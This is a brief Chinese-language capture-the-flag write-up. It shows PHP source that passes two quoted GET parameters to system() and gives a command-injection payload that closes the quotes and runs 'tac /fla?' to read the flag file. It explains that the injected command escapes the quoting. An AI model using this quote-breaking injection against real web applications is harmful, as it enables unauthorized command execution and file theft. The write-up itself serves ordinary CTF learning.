源码:
$flag = "#flag in /flag"; $comm1 = '"' . $comm1 . '"'; $comm2 = '"' . $comm2 . '"'; $cmd = "file $comm1 $comm2"; system($cmd); ?>
payload:?comm1=index.php";tac /fla?;"&comm2
$cmd="file index.php";tac /fla?" " " ";
这里tac /fla?两边没有加引号